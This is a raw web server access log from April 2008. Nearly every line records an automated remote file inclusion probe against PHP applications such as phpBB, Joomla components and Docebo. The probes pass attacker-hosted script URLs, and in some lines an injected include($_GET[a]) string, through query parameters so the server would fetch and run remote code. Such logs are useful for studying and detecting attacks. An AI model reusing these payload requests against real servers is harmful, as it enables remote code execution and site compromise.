64.84.20.85 - - [01/Apr/2008:07:05:05 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:07:05:25 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:07:05:25 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:07:05:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:07:05:27 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:07:05:27 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:07:05:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:07:05:39 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:07:05:39 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:07:05:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:27 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:27 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:27 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:29 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:29 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:29 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:33 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:33 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:33 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:34 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:34 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:34 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:34 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:34 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:34 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:35 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:35 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:07:07:35 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:07:08:08 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:07:08:09 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:07:08:09 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.159.63.144 - - [01/Apr/2008:07:11:35 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ikazlevhalari.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
216.118.81.182 - - [01/Apr/2008:07:13:27 -0700] "GET /logs/access_071201.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
87.118.102.153 - - [01/Apr/2008:07:13:42 -0700] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.bsfadvisors.com"
87.118.102.153 - - [01/Apr/2008:07:13:42 -0700] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.bsfadvisors.com"
72.29.81.87 - - [01/Apr/2008:07:15:49 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.87 - - [01/Apr/2008:07:15:49 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
165.141.177.14 - - [01/Apr/2008:07:15:56 -0700] "GET //index.php?skin_file=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.bsfadvisors.com"
165.141.177.14 - - [01/Apr/2008:07:15:58 -0700] "GET /logs//index.php?skin_file=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:07:16:34 -0700] "GET /logs/access.log//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:07:16:35 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:07:16:35 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:07:19:27 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.87 - - [01/Apr/2008:07:20:32 -0700] "GET /logs/access.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.65.34.76 - - [01/Apr/2008:07:20:59 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.solheimsimport.no/shop/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.65.34.76 - - [01/Apr/2008:07:20:59 -0700] "GET //skin/zero_vote/error.php?dir=http://www.solheimsimport.no/shop/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.65.34.76 - - [01/Apr/2008:07:20:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.solheimsimport.no/shop/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
72.29.81.87 - - [01/Apr/2008:07:23:05 -0700] "GET /logs/access_080101.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.159.200.63 - - [01/Apr/2008:07:25:50 -0700] "GET /logs/access.log HTTP/1.1" 200 410569 "-" "Mozilla/5.0 (X11; U; Linux x86_64; rv:1.8.1.12)" "bsfadvisors.com"
89.159.200.63 - - [01/Apr/2008:07:25:51 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; rv:1.8.1.12)" "bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:07:26:09 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.archfuck.ru/administrator/components/com_remository/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:07:26:10 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.archfuck.ru/administrator/components/com_remository/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
70.86.24.154 - - [01/Apr/2008:07:26:43 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.24.154 - - [01/Apr/2008:07:26:43 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
70.86.24.154 - - [01/Apr/2008:07:26:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/tandry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.67.26.84 - - [01/Apr/2008:07:28:04 -0700] "GET /logs/access_080101.log/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:07:29:11 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:07:29:12 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:07:31:07 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:07:31:07 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:07:33:00 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:07:33:00 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:07:33:47 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:07:33:47 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.159.63.144 - - [01/Apr/2008:07:35:10 -0700] "GET /logs/access_080101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ikazlevhalari.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.159.63.144 - - [01/Apr/2008:07:35:10 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ikazlevhalari.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:07:36:23 -0700] "GET /logs/access.log/class/class.dashboard_cms.php?where_framework=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:07:36:23 -0700] "GET /class/class.dashboard_cms.php?where_framework=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:07:36:23 -0700] "GET /logs/class/class.dashboard_cms.php?where_framework=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:07:38:36 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:07:41:55 -0700] "GET /logs/access.log//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:07:41:55 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:07:41:56 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:07:43:46 -0700] "GET /logs/access.log/class/class.admin_menu_cms.php?where_framework=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:07:43:46 -0700] "GET /class/class.admin_menu_cms.php?where_framework=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:07:43:47 -0700] "GET /logs/class/class.admin_menu_cms.php?where_framework=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
61.63.3.45 - - [01/Apr/2008:07:44:36 -0700] "GET /logs/access_080101.log//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
61.63.3.45 - - [01/Apr/2008:07:44:37 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
61.63.3.45 - - [01/Apr/2008:07:44:38 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:07:46:05 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:07:48:31 -0700] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:07:55:22 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:07:55:43 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:07:55:45 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
200.126.108.198 - - [01/Apr/2008:07:56:49 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:07:58:32 -0700] "GET /support/mailling/maillist/inc/initdb.php?absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:07:58:32 -0700] "GET /logs/support/mailling/maillist/inc/initdb.php?absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:11 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:11 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:11 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:11 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:11 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:11 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:07:59:18 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:07:59:18 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:44 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:44 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:44 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:44 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:44 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:07:59:44 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:07:59:50 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:07:59:50 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:07:59:50 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:07:59:50 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:07:59:51 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:07:59:51 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:00:16 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
